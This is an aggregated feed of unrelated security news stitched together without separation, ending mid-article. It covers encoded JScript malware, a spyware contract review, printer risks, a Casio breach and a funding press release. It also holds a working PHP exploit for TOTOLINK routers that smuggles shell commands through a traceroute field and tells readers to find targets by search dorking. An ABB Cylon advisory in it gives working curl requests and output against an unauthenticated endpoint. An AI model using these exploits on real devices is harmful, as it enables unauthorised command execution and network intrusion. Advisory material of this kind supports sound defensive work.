Cyber attackers are using encoded JavaScript files to hide malware, abusing Microsoft’s Script Encoder to disguise harmful scripts…

Cyber attackers are using encoded JavaScript files to hide malware, abusing Microsoft’s Script Encoder to disguise harmful scripts in .jse files. ANY.RUN’s sandbox helps detect and decrypt these threats, enhancing security analysis efficiency.

Cyber attackers constantly innovate new ways to hide their malicious intentions. Recently, cybersecurity researchers at ANY.RUN came across a tactic used by attackers which involves the abuse of encoded JavaScript files. Attackers have been using the Microsoft Script Encoder to disguise harmful scripts within .jse files.

This tactic allows malware to remain hidden within seemingly legitimate scripts, posing a major threat to unsuspecting users and traditional security measures.

****Microsoft Script Encoder Exploited** **

Microsoft originally developed the Script Encoder to help developers obfuscate JavaScript and VBscript while keeping them executable with wscript and similar interpreters. This tool was initially designed to protect source code, but it has also become a valuable resource for malware developers.

By encoding JavaScript into a non-human-readable format, attackers can hide their malicious scripts. The latter can be delivered through phishing campaigns or drive-by-download attacks, where users unknowingly run the malicious script.

This obfuscation technique makes it difficult for traditional security tools to detect hidden threats. However, they can be detected faster with the help of tools, like ANY.RUN’s Script Tracer.

****How to Decrypt Encoded Malicious Scripts****

To view the log of the script execution, run the sample inside ANY.RUN’s sandbox. 

**View analysis session**

After running the sample, you can discover the behaviour of the script in an isolated environment using ANY.RUN’s Script Tracer:

*   **Obtain the length of the encrypted data**

Begin by identifying the length of the encoded portion of the script. While doing this, keep an eye out for the @ symbol, which serves as a key marker in the script. 

Encrypted data after the symbol @ is displayed in ANY.RUN’s sandbox

When you see @, it indicates that the next character has been modified using a specific algorithm.

*   **Substitute values in order**

With the encoded characters identified, begin the substitution process. This step involves replacing each encoded symbol with its corresponding decoded value. To decode each character in the script, follow the instructions in the image below:

Decoding the encoded JavaScript with ANY.RUN’s sandbox

*   **Obtain the decrypted value**

As you decode each character, you will start to uncover the readable form of the script. This step-by-step decoding reveals the underlying commands hidden within the encoded data.

*   **Insert the decrypted bytes into the buffer**

After decoding each character, store the decoded result in a buffer (a temporary space to hold the data). Continue adding decrypted characters until the entire script has been processed.

*   **Use the ord() function for character values**

Take the numeric value of each symbol using the ord() function, then retrieve the corresponding decoded character from the predefined encoding tuple using **PICK\_ENCODING**.

****Analyzing Malicious Scripts in a Safe Environment****

Manually decrypting encoded scripts can be complex and time-consuming. To make the decryption process easier and faster, you can use tools like ANY.RUN’s sandbox. 

It allows you to analyze malware behaviour in a secure environment, giving you the insights you need for detailed analysis.

Sign up for a 14-day free trial for unlimited malware analysis and see how it simplifies the process.

1.  Analysis of Top Infostealers: Redline, Vidar and Formbook
2.  PythonAnywhere Cloud Platform Abused for Hosting Ransomware
3.  OpenSSF Warns of Fake Maintainers Targeting JavaScript Projects
4.  ANY.RUN Upgrades Threat Intelligence to Identify Emerging Threats
5.  Visa warns of Baka JavaScript skimmer capable of evading detection

Attackers Use Encoded JavaScript to Deliver Malware

Immigration and Customs Enforcement's contract with Paragon Solutions faces scrutiny over whether it complies with the Biden administration's executive order on spyware, WIRED has learned.

A $2 million contract that United States Immigration and Customs Enforcement signed with Israeli commercial spyware vendor Paragon Solutions has been paused and placed under compliance review, WIRED has learned.

The White House’s scrutiny of the contract marks the first test of the Biden administration’s executive order restricting the government’s use of spyware.

The one-year contract between Paragon’s US subsidiary in Chantilly, Virginia, and ICE’s Homeland Security Investigations (HSI) Division 3 was signed on September 27 and first reported by WIRED on October 1. A few days later, on October 8, HSI issued a stop-work order for the award “to review and verify compliance with Executive Order 14093,” a Department of Homeland Security spokesperson tells WIRED.

The executive order signed by President Joe Biden in March 2023 aims to restrict the US government’s use of commercial spyware technology while promoting its “responsible use” that aligns with the protection of human rights.

DHS did not confirm whether the contract, which says it covers a “fully configured proprietary solution including license, hardware, warranty, maintenance, and training,” includes the deployment of Paragon’s flagship product, Graphite, a powerful spyware tool that reportedly extracts data primarily from cloud backups.

“We immediately engaged the leadership at DHS and worked very collaboratively together to understand exactly what was put in place, what the scope of this contract was, and whether or not it adhered to the procedures and requirements of the executive order,” a senior US administration official with first-hand knowledge of the workings of the executive order tells WIRED. The official requested anonymity to speak candidly about the White House’s review of the ICE contract.

Paragon Solutions did not respond to WIRED's request to comment on the contract's review.

The process laid out in the executive order requires a robust review of the due diligence regarding both the vendor and the tool, to see whether any concerns, such as counterintelligence, security, and improper use risks, arise. It also stipulates that an agency may not make operational use of the commercial spyware until at least seven days after providing this information to the White House or until the president's national security adviser consents.

“Ultimately, there will have to be a determination made by the leadership of the department. The outcome may be—based on the information and the facts that we have—that this particular vendor and tool does not spur a violation of the requirements in the executive order,” the senior official says.

While publicly available details of ICE’s contract with Paragon are relatively sparse, its existence alone raised alarms among civil liberties groups, with the nonprofit watchdog Human Rights Watch saying in a statement that “giving ICE access to spyware risks exacerbating” the department’s problematic practices. HRW also questioned what it calls the Biden administration’s “piecemeal approach” to spyware regulation.

The level of seriousness with which the US government approaches the compliance review of the Paragon contract will influence international trust in the executive order, experts say.

“We know the dangers mercenary spyware poses when sold to dictatorships, but there is also plenty of evidence of harms in democracies,” says John Scott-Railton, a senior researcher at the University of Toronto’s Citizen Lab who has been instrumental in exposing spyware-related abuses. “This is why oversight, transparency, and accountability around any US agency attempt to acquire these tools is essential.”

International efforts to rein in commercial spyware are gathering pace. On October 11, during the 57th session of the Human Rights Council, United Nation member states reached a consensus to adopt language acknowledging the threat that the misuse of commercial spyware poses to democratic values, as well as the protection of human rights and fundamental freedoms. “This is an important norm setting, especially for countries who claim to be democracies,” says Natalia Krapiva, senior tech-legal counsel at international nonprofit Access Now.

Although the US is leading global efforts to combat spyware through its executive order, trade and visa restrictions, and sanctions, the European Union has been more lenient. Only 11 of the 27 EU member states have joined the US-led initiative stipulated in the “Joint Statement on Efforts to Counter the Proliferation and Misuse of Commercial Spyware,” which now counts 21 signatories, including Australia, Canada, Costa Rica, Japan, and South Korea.

“An unregulated market is both a threat to the citizens of those countries, but also to those governments, and I think that increasingly our hope is that there is a recognition \[in the EU\] of that as well,” the senior US administration official tells WIRED.

The European Commission published on October 16 new guidelines on the export of cyber-surveillance items, including spyware; however, it has yet to respond to the EU Parliament's call to draft a legislative proposal or admonish countries for their misuse of the technology.

While Poland launched an inquiry into the previous government’s spyware use earlier this year, a probe in Spain over the use of spyware against Spanish politicians has so far led to no accusations against those involved, and one in Greece has cleared government agencies of any wrongdoing.

“Europe is in the midst of a mercenary spyware crisis,” says Scott-Railton. “I have looked on with puzzled wonderment as European institutions and governments fail to address this issue at scale, even though there are domestic and export-related international issues.”

With the executive order, the US focuses on its national security and foreign policy interests in the deployment of the technology in accordance with human rights and the rule of law, as well as mitigating counterintelligence risks (e.g. the targeting of US officials). Europe—though it acknowledges the foreign policy dimension—has so far primarily concentrated on human rights considerations rather than counterintelligence and national security threats.

Such a threat became apparent in August, when Google’s Threat Analysis Group (TAG) found that Russian government hackers were using exploits made by spyware companies NSO Group and Intellexa.

Meanwhile, Access Now and Citizen Lab speculated in May that Estonia may have been behind the hacking of exiled Russian journalists, dissidents, and others with NSO Group’s Pegasus spyware.

“In an attempt to protect themselves from Russia, some European countries are using the same tools against the same people that Russia is targeting,” says Access Now’s Krapiva. “By having easier access to this kind of vulnerabilities, because they are then sold on the black market, Russia is able to purchase them in the end.”

“It’s a huge mess,” she adds. “By attempting to protect national security, they actually undermine it in many ways.”

Citizen Lab’s Scott-Railton believes these developments should raise concern among European decisionmakers just as they have for their US counterparts, who emphasized the national security aspect in the executive order.

“What is it going to take for European heads of state to recognize they have a national security threat from this technology?” Scott-Railton says. “Until they recognize the twin human rights and national security threats, the way the US has, they are going to be at a tremendous security disadvantage.”

ICE's $2 Million Contract With a Spyware Vendor Is Under White House Review

The vulnerability allows an unauthenticated attacker to perform network operations such as ping, traceroute, or nslookup on arbitrary hosts or IPs by sending a crafted GET request to networkDiagAjax.php. This could be exploited to interact with or probe internal or external systems, leading to internal information disclosure and misuse of network resources.

ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility Execution

ABB Cylon Aspect version 3.08.01 allows an unauthenticated attacker to perform network operations such as ping, traceroute, or nslookup on arbitrary hosts or IPs by sending a crafted GET request to networkDiagAjax.php. This could be exploited to interact with or probe internal or external systems, leading to internal information disclosure and misuse of network resources.

    ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The vulnerability allows an unauthenticated attacker to perform networkoperations such as ping, traceroute, or nslookup on arbitrary hosts or IPs bysending a crafted GET request to networkDiagAjax.php. This could be exploitedto interact with or probe internal or external systems, leading to internalinformation disclosure and misuse of network resources.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5844Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5844.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=packetstormsecurity.org"<div>Server:    8.8.8.8<br>Address 1: 8.8.8.8 dns.google<br><br>Name:      packetstormsecurity.org<br>Address 1: 198.84.60.198 198-84-60-198.ash01.rokabear.com<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=ping&host=1.1.1.1"<div>PING 1.1.1.1 (1.1.1.1): 56 data bytes<br>64 bytes from 1.1.1.1: seq=0 ttl=53 time=61.176 ms<br>64 bytes from 1.1.1.1: seq=1 ttl=53 time=60.986 ms<br>64 bytes from 1.1.1.1: seq=2 ttl=53 time=100.660 ms<br><br>--- 1.1.1.1 ping statistics ---<br>3 packets transmitted, 3 packets received, 0% packet loss<br>round-trip min/avg/max = 60.986/74.274/100.660 ms<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=127.0.0.1"<div>traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets<br> 1  localhost.localdomain (127.0.0.1)  0.019 ms  0.010 ms  0.009 ms<br></div>

ABB Cylon Aspect 3.08.01 networkDiagAjax.php Remote Network Utility Execution

PRESS RELEASE

TEL AVIV, Israel, Oct. 15, 2024 /PRNewswire/ -- Port, the leading internal developer portal, announced today $35 million in Series B funding, bringing its total funding to $58M to date. The round was led by Accel, with participation from Bessemer Venture Partners and existing investors, including Team8 and TLV Partners. The highly oversubscribed round comes on the heels of Port's exceptional growth, with a 7x year-over-year increase in revenue. Port's user base has expanded eightfold since its Series A funding just one year ago, with customers including leading brands like LG, British Telecom and GitHub, which recently selected Port as the internal developer portal for their engineering team. Additionally, Port announced the integration of LLMs into its platform, enabling organizations to enhance their developer experience with generative AI.

Modern software development has evolved dramatically, with the responsibilities of developers expanding far beyond writing code. They are now responsible for the delivery process of features, managing cloud resources, handling incidents and outages, as well as complying with the organization's standards for security, quality, and compliance. This expanded responsibility, coupled with the intricacies of the modern development ecosystem, has created a chaotic situation where developers are constantly seeking guidance, creating tickets for tasks outside their core competencies, and relying heavily on tribal knowledge to navigate the landscape. This not only slows down development but also exacerbates quality, security, and compliance issues.

Port enables developers to handle the full scope of their expanded role by providing an internal developer portal that acts as a central work hub. The portal unifies all of the tools and workflows developers need to fully own the software development life cycle within an intuitive interface. The open platform is highly adaptable, integrating with the existing tech stack behind the scenes to create a standardized operating environment for R&D teams. The portal allows developers to perform complex tasks, like spinning up a new microservice, in just a few clicks with all best practices baked in. This approach not only enhances developer productivity but also ensures compliance with company policies.

"Development teams today are overwhelmed with responsibilities that extend far beyond writing code, leading to operational chaos and a degradation of standards," said Zohar Einy, co-founder and CEO of Port. "Our mission is to empower teams to start left, ensuring that everything is secure, compliant, and high-quality by design. Port provides a dynamic, customizable platform that fits into each company's DNA and evolves with their needs, enabling all stakeholders — from developers to security teams to leadership — to collaborate effectively and maintain organizational standards. Port empowers teams to be self-sufficient owners of the software they develop, restoring agility and driving significant business impact."

Port is also announcing the integration of popular LLMs with its platform, allowing organizations to embed AI capabilities directly into their customized developer portals. The open nature of Port's platform enables each organization to leverage AI models according to their needs. Popular uses include: investigating incidents using natural language search to quickly find root causes and relevant experts, automatically generating clear error messages from failed build logs, and recommending internal libraries and components to developers based on the feature or service they're currently working on.

"We see the internal developer portal market as the next big must have in software development, with the potential to rival the impact of APM or Git providers," said Matt Robinson, Partner at Accel. "Port has emerged as the #1 product in this space due to the platform being highly customizable while also maintaining agility and ease of use. Zohar and Yonatan's dev-first approach sets them apart and their exceptional growth speaks volumes about the team's product execution and market fit."

"Over the past decade, organizations have invested heavily in DevOps, automating processes and adopting best practices to drive agility," said Amit Karp, Partner at Bessemer Venture Partners. "However, they haven't reaped the full benefits due to the increased complexities introduced. Port has experienced a meteoric rise because it arrived at a key moment, serving as the missing piece that completes the DevOps puzzle. Customizable internal developer portals enable organizations to finally unlock the true promise of DevOps — improved DORA metrics, streamlined workflows, enhanced agility, adherence to standards, and empowered developers."

About Port 

Port is the leading platform for creating internal developer portals, empowering all stakeholders in the software development lifecycle. Founded in 2022 by Zohar Einy and Yonatan Boguslavski, it emerged from the founders' experience building an internal developer portal for Israel's elite 8200 intelligence unit, which served over 2,000 developers. Now with 100 employees and tens of thousands of users, Port has rapidly become the de facto standard in the market, providing a central hub that unifies tools, knowledge, and workflows for developers, security teams, and leadership alike. The platform's customizable interface enables seamless collaboration and ensures compliance with organizational standards, from setting up microservices to managing cloud resources and handling incidents. Port's open platform integrates with existing tech stacks and incorporates AI capabilities, adapting to each company's unique DNA. By streamlining processes and enhancing visibility, Port drives significant business impact, improves DORA metrics, and unlocks the true promise of DevOps for companies of all sizes. To learn more about Port's internal developer portal platform, visit getport.io.

Port Raises $35M for its End-to-End Internal Developer Portal

The shift to a distributed work model has exposed organizations to new threats, and a low but continuing stream of printer-related vulnerabilities isn't helping.

Source: Magnetic Mcc via Shutterstock

The shift to hybrid work models has exposed new vulnerabilities in corporate print infrastructure and heightened security risks at many organizations.

The risks run the gamut and include employees using insecure and unmanaged printers, remote workers sending print jobs over public networks, inadequate user authentication and print job release processes, exposed local spools and caches, and inconsistent patching practices.

A relatively low but steady volume of print-related vulnerabilities have exacerbated these issues. Recent examples of such vulnerabilities include CVE-2024-38199 (a remote code execution \[RCE\] vulnerability in the Windows or Line Printer Daemon \[LPD\] Service), CVE-2024-21433 (a Windows Print Spooler elevation of privilege vulnerability), and CVE-2024-43529 (a similar vulnerability that Microsoft disclosed in its October security update). The threats are certainly not Windows-specific, either. Recently, researchers discovered a set of potentially severe flaws in Common Unix Printing System (CUPS), a legacy protocol largely used in Linux, Unix, and heterogeneous environments.

Though few of these flaws have presented as major a threat as the PrintNightmare RCE flaw from 2021 in the Windows Print Spooler service, they have complicated the challenge of managing modern print infrastructure. Attackers, including nation-state actors, have sometimes abused printer software vulnerabilities — like CVE-2022-38028 — to substantial effect in their campaigns.

**Increase in Printer-Related Breaches**

The trends have driven an increase in print-related data breaches. A recent study that Quocirca conducted found that 67% of respondents experienced a printer-related security incident in 2024, compared with 61% last year. Small and mid-market organizations fared worse, with three-quarters (74%) reporting a printer-related data loss incident. Thirty-three percent pointed to unmanaged, employee-owned printers as a major security concern, and 29% identified vulnerabilities in office printing environments as presenting a major risk. More than a quarter (28%) identified their biggest printer related security challenge as protecting sensitive and confidential information.

Casey Ellis, founder and chief strategy officer at Bugcrowd, says the takeaway for organizations is that print security needs to be priority for decision makers. "Printer and print servers are an excellent place to establish persistence and gain business intelligence on a target," he says. The CUPS vulnerabilities showed that old, unused printer software can still represent a significant attack surface, especially for internal attacks and lateral movement.

Unfortunately, many organizations might be underestimating the risks or overlooking them altogether. And the shift to cloud/hybrid print environments have made printer infrastructure even more of an invisible issue from a vulnerability management standpoint, Ellis notes. "Let’s be real — the list of people who spend their days thinking about or even interacting with printers is a pretty small one," he says. "If your vulnerability management process allows out-of-sight, out-of-mind to dictate priority, it’s easy to miss \[printer security risks\]," he says.

The main takeaway is a general one, Ellis says: "Organizations need to remain diligent about their asset inventory and overall attack surface and ensure that they have a process for evaluating the risk."

**Printers, an Underestimated Risk?**

The legacy nature of many printer service environments is another issue, because vulnerabilities can sometimes exist undetected on them for years. Often, these printer environments lack the kind of monitoring tools that are available on other endpoint systems, making them a big target for attackers.

Often flaws are introduced into organizations' print infrastructure because print services are on by default and administrators are not aware of this, says Tom Boyer, director of security at Automox. "This means that this risk will go unseen for years and adversaries use that to their advantage," he notes. "They often know more about the target environment than the company themselves."

The Quocirca survey found security to be the top barrier to adoption of cloud print services as well.

"Although many organizations believe the cloud is more secure than an on-premise environment, security concerns remain a critical barrier to cloud print adoption," says Nicole Heinsler, chief engineer of security and device management at Xerox. "Overall, there is a disconnect between providers and clients on how the cloud can improve security by managing zero-day threats more effectively, and how data sovereignty can be more easily managed through cloud policies."

**Cloud Printing Cyber-Risks**

The survey found that many organizations view resting data — such as print jobs waiting in a queue and documents uploaded to the cloud print service — as a primary risk, Heinsler says: "This is why incorporating zero-trust principles in your cloud print infrastructure, such as authentication and access control, monitoring, detection, remediation, data and document protection, encryption, and automation, is so imperative."

One way to centralize print management infrastructure is to use cloud print options that deploy a native cloud architecture, rather than to attempt a "lift-and-shift" of traditional on-premises server architecture to a private cloud, she notes. The challenges organizations face will depend on the level of customization their applications have.

"For example, if they use standard print protocols, there's often little issue with \[cloud\] integration," Heinsler says. "\[But\] specific applications should be subjected to proof of concept before full enterprise deployment."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Hybrid Work Exposes New Vulnerabilities in Print Security

TOTOLINK version 9.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : TOTOLINK 9.x Code Injection Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.totolink.net/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class TotolinkExploit {  
    private $targetUri;  
    private $sleepTime;

    public function __construct($targetUri, $sleepTime = 3) {  
        $this->targetUri = $targetUri;  
        $this->sleepTime = $sleepTime;  
    }

    // Function to send POST request and execute the command on the target  
    public function executeCommand($cmd) {  
        $num = rand(1, 500);  
        $url = $this->targetUri . '/cgi-bin/cstecgi.cgi';  
        $data = json_encode([  
            "command" => "127.0.0.1; {$cmd};#",  
            "num" => $num,  
            "topicurl" => "setTracerouteCfg"  
        ]);

        // Send POST request  
        return $this->sendPostRequest($url, $data);  
    }

    // Check if the target is vulnerable  
    public function check() {  
        echo "Checking if the target can be exploited.\n";

        // Test using echo command to see if it's vulnerable  
        $response = $this->executeCommand("echo test");  
        if (!$response || strpos($response, 'success') === false) {  
            return "Target is likely not vulnerable.\n";  
        }

        // Test command injection using sleep  
        echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";  
        $start = microtime(true);  
        $this->executeCommand("sleep {$this->sleepTime}");  
        $elapsedTime = microtime(true) - $start;

        echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";  
        if ($elapsedTime >= $this->sleepTime) {  
            return "Target is vulnerable: Blind command injection successful.\n";  
        }

        return "Command injection test failed.\n";  
    }

    // Exploit the vulnerability to run the payload  
    public function exploit($payload) {  
        echo "Executing payload on the target.\n";  
        $this->executeCommand($payload);  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => $postFields  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with actual target URL  
$exploit = new TotolinkExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

TOTOLINK 9.x Command Injection

Snipe-IT before 7.0.10 allows remote code execution (associated with cookie serialization) when an attacker knows the APP_KEY. This is exacerbated by .env files, available from the product's repository, that have default APP_KEY values.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-57qh-vmjr-5jxg: Snipe-IT remote code execution

Casio experienced a major cyberattack on October 5, 2024, causing system disruptions and raising concerns about a potential…

Casio experienced a major cyberattack on October 5, 2024, causing system disruptions and raising concerns about a potential data breach. The company is investigating the incident with cybersecurity experts.

Casio, the iconic Japanese electronics company, is in the spotlight again due to another cybersecurity breach. On October 5, 2024, **Casio** experienced a major cyberattack involving unauthorized access to its network, resulting in system-wide disruptions.

Although the company is still investigating whether attackers compromised sensitive data in the October 2024 incident, this comes on the heels of a significant data breach **in October 2023**, caused by human error. That breach affected users in 148 countries and targeted Casio’s ClassPad education platform, which is widely used by students and educators.

****The October 2024 Breach: What Happened?****

According to Casio’s **security advisory** published in Japanese, on October 5, 2024, an unidentified third-party actor gained unauthorized access to the company’s network triggering outages and temporarily disrupting several of the company’s services.

Casio has not yet revealed which specific services were impacted. The network breach is under investigation, and the company is working closely with cybersecurity experts to determine the full extent of the damage.

Casio released a statement acknowledging the breach and its potential impact, stating, “We deeply apologize for any concern and inconvenience this may cause to our customers and partners.” The company has restricted external access to its systems while the investigation is ongoing.

****Data Breach Concerns****

One of the concerns following the October 2024 cyberattack is whether any sensitive data, such as customer information or business-critical data, was compromised. As of now, no ransomware group has taken responsibility for the attack, despite the systemic disruptions that are typical in ransomware attacks.

Hackread.com is closely monitoring the situation, and this article will be updated as soon as Casio releases new information. Stay tuned for further developments!

1.  **Casio China Hacked, 150,000 user accounts leaked**
2.  **Casio Electronics Taiwan Website Hacked by SaMuRai Hacker**
3.  **Dell Discloses Data Breach As Hacker Sells 49M Customer Data**
4.  **Lesson from Casio’s Data Breach: Database Security Challenges**
5.  **Acer Data Breach: Hacker Claims to Sell 160GB Trove of Stolen Data**

Casio Hit by Major Cyberattack AGAIN

Businesses that successfully manage the complexities of multicloud management will be best positioned to thrive in an increasingly digital and interconnected world.

Source: John Williams RF via Alamy Stock Photo

COMMENTARY

Improper cloud security has cost organizations millions — sometimes even billions — in revenue in the past decade alone. A significant example is Japanese automaker Toyota, which suffered a data breach due to cloud misconfiguration, exposing the personal data of more than 2 million customers. Another example is Accenture, which in August 2021 fell victim to the LockBit ransomware group. Due to cloud misconfigurations, hackers gained access to and stole 6TB of proprietary client data, demanding a ransom of $50 million. These incidents highlight the catastrophic impact that cloud security failures can have. 

As organizations increasingly adopt multicloud strategies, managing multiple cloud environments can lead to cloud misconfigurations and improper handling of cloud resources. Each cloud provider offers different tools, settings, and protocols, making it challenging to ensure consistent security configurations across all platforms. These misconfigurations often are the root cause of significant security breaches, as seen in the examples above. The lack of visibility and control over multiple clouds exacerbates these risks, making it imperative for organizations to adopt robust cloud security practices.

The shift to multicloud environments offers enhanced reliability, reduced vendor lock-in risks, and greater business capabilities. However, this transition is fraught with complexities that require careful planning and strategic management to ensure success. Let's look at the critical aspects of managing multicloud environments, focusing on governance, security, and operational challenges. 

**Evolution and Risks of Multicloud Environments**

